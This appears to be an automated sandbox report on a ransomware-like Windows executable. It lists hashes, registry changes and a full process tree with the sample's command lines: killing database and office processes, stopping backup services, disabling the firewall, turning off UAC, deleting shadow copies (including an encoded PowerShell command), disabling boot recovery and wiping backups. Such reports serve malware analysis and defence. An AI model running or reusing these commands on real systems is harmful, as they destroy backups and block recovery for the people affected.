Analysis
Max time kernel: 33s
Max time network: 66s
Platform: windows7_x64
Resource: win7v20210408
Submitted: 27-07-2021 17:10

Static task: static1
Behavioral task: behavioral1
  Sample: 1069-cc87764d70827118862689d1630efc72547f97aa.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: 1069-cc87764d70827118862689d1630efc72547f97aa.exe
  Resource: win10v20210410

General
Target: 1069-cc87764d70827118862689d1630efc72547f97aa.exe
Size: 3.2MB
MD5: f17e50158a1faf71deb3a6e8b4f3271f
SHA1: cc87764d70827118862689d1630efc72547f97aa
SHA256: 99a0753cba25425651e42ff7673506aa4090a03d8398f702e41d80ca5c2b212e
SHA512: e60404ec7d526dd522ca6347c1fbc87f9783b0c0fa31ca4b8aaa656718a8ceaaf26ec8259a31df58ddb0500df8b7a0f63ad7aca652860d50baf4bc66fdd7643b
Malware Config
Signatures
Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
Disables Task Manager via registry modification
Drops file in Drivers directory (1 IoC)
  1069-cc87764d70827118862689d1630efc72547f97aa.exe: File created C:\Windows\System32\drivers\etc\host
Modifies Windows Firewall (1 TTP)
Checks whether UAC is enabled (1 IoC)
  1069-cc87764d70827118862689d1630efc72547f97aa.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  1069-cc87764d70827118862689d1630efc72547f97aa.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\@Adsız@.jpg"
Drops file in Windows directory (1 IoC)
  1069-cc87764d70827118862689d1630efc72547f97aa.exe: File created C:\Windows\Please Read ME!!!.log
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Interacts with shadow copies (2 TTPs, 4 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  vssadmin.exe PIDs: 1248, 268, 556, 952
Kills process with taskkill (14 IoCs)
  taskkill.exe PIDs: 2444, 2512, 2308, 2480, 2184, 2272, 2152, 2340, 2372, 2040, 2120, 2544, 2220, 2412
Modifies Control Panel (2 IoCs)
  1069-cc87764d70827118862689d1630efc72547f97aa.exe: Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\desktop
  1069-cc87764d70827118862689d1630efc72547f97aa.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\TileWallpaper = "0"
Runs net.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  powershell.exe PID 1844 (2 events)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  taskkill.exe PID 2040: SeDebugPrivilege
  vssvc.exe PID 1600: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  WMIC.exe PID 1732: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  WMIC.exe PID 1352: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  powershell.exe PID 1844: SeDebugPrivilege
  WMIC.exe PID 1352 (second pass): the same list as above, up to and including 34 (35 not recorded)
Suspicious use of FindShellTrayWindow (1 IoC)
  NOTEPAD.EXE PID 1696
Suspicious use of WriteProcessMemory (64 IoCs; each pair was recorded 4 times)
  PID 1100 (1069-cc87764d70827118862689d1630efc72547f97aa.exe) wrote to PID 1976 (cmd.exe)
  PID 1100 (1069-cc87764d70827118862689d1630efc72547f97aa.exe) wrote to PID 1788 (cmd.exe)
  PID 1100 (1069-cc87764d70827118862689d1630efc72547f97aa.exe) wrote to PID 1760 (cmd.exe)
  PID 1100 (1069-cc87764d70827118862689d1630efc72547f97aa.exe) wrote to PID 1776 (cmd.exe)
  PID 1100 (1069-cc87764d70827118862689d1630efc72547f97aa.exe) wrote to PID 2028 (cmd.exe)
  PID 1976 (cmd.exe) wrote to PID 2040 (taskkill.exe)
  PID 1788 (cmd.exe) wrote to PID 2024 (net.exe)
  PID 1760 (cmd.exe) wrote to PID 1280 (netsh.exe)
  PID 1100 (1069-cc87764d70827118862689d1630efc72547f97aa.exe) wrote to PID 1192 (cmd.exe)
  PID 1776 (cmd.exe) wrote to PID 1248 (vssadmin.exe)
  PID 1100 (1069-cc87764d70827118862689d1630efc72547f97aa.exe) wrote to PID 1492 (cmd.exe)
  PID 2028 (cmd.exe) wrote to PID 268 (vssadmin.exe)
  PID 2024 (net.exe) wrote to PID 1028 (net1.exe)
  PID 1492 (cmd.exe) wrote to PID 556 (vssadmin.exe)
  PID 1192 (cmd.exe) wrote to PID 1844 (powershell.exe)
  PID 1788 (cmd.exe) wrote to PID 1576 (net.exe)
System policy modification (1 TTP, 17 IoCs)
  All by 1069-cc87764d70827118862689d1630efc72547f97aa.exe under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
  Set value (int) EnableLUA = "0"
  Set value (int) FilterAdministratorToken = "0"
  Set value (int) undockwithoutlogon = "1"
  Set value (int) PromptOnSecureDesktop = "1"
  Set value (int) scforceoption = "0"
  Set value (int) shutdownwithoutlogon = "1"
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
  Set value (int) ConsentPromptBehaviorAdmin = "5"
  Set value (int) EnableInstallerDetection = "1"
  Set value (int) EnableUIADesktopToggle = "5"
  Set value (int) ConsentPromptBehaviorUser = "3"
  Set value (int) dontdisplaylastusername = "0"
  Set value (int) EnableSecureUIAPaths = "1"
  Set value (str) legalnoticecaption (value not recorded)
  Set value (int) EnableVirtualization = "1"
  Set value (str) legalnoticetext (value not recorded)
  Set value (int) ValidateAdminCodeSignatures = "0"
Processes (the bracketed number is the depth in the process tree)
[1] C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe"
    - Drops file in Drivers directory
    - Checks whether UAC is enabled
    - Sets desktop wallpaper using registry
    - Drops file in Windows directory
    - Modifies Control Panel
    - Suspicious use of WriteProcessMemory
    - System policy modification
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im sql.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im winword.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im wordpad.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im outlook.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im thunderbird.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im oracle.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im excel.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im onenote.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im virtualboxvm.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im node.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im QBW32.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im WBGX.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im Teams.*
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im Flow.*
        - Kills process with taskkill
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop DbxSvc
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop DbxSvc
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop OracleXETNSListener
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop OracleXETNSListener
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop OracleServiceXE
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop OracleServiceXE
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop AcrSch2Svc
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop AcrSch2Svc
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop AcronisAgent
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop AcronisAgent
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop Apache2.4
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop Apache2.4
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop SQLWriter
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop SQLWriter
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop MSSQL$SQLEXPRESS
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop MSSQLServerADHelper100
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop MSSQLServerADHelper100
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop MongoDB
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop MongoDB
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop SQLAgent$SQLEXPRESS
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop SQLBrowser
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop SQLBrowser
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop CobianBackup11
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop CobianBackup11
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop cbVSCService11
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop cbVSCService11
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop QBCFMontorService
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop QBCFMontorService
    [3] C:\Windows\SysWOW64\net.exe
        Command line: net stop QBVSS
      [4] C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop QBVSS
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\netsh.exe
        Command line: netsh firewall set opmode disable
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
        - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
        - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\vssadmin.exe
        Command line: vssadmin delete shadows /all /quiet
        - Interacts with shadow copies
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        Command line: wmic shadowcopy delete
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
    [3] C:\Windows\SysWOW64\vssadmin.exe
        Command line: vssadmin delete shadows /all /quiet
        - Interacts with shadow copies
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        Command line: wmic shadowcopy delete
        - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\vssvc.exe
    Command line: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\NOTEPAD.EXE
    Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Please Read ME!!!.log
    - Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\Desktop\Please Read ME!!!.log
  MD5: 81051bcc2cf1bedf378224b0a93e2877
  SHA1: ba8ab5a0280b953aa97435ff8946cbcbb2755a27
  SHA256: 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
  SHA512: 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d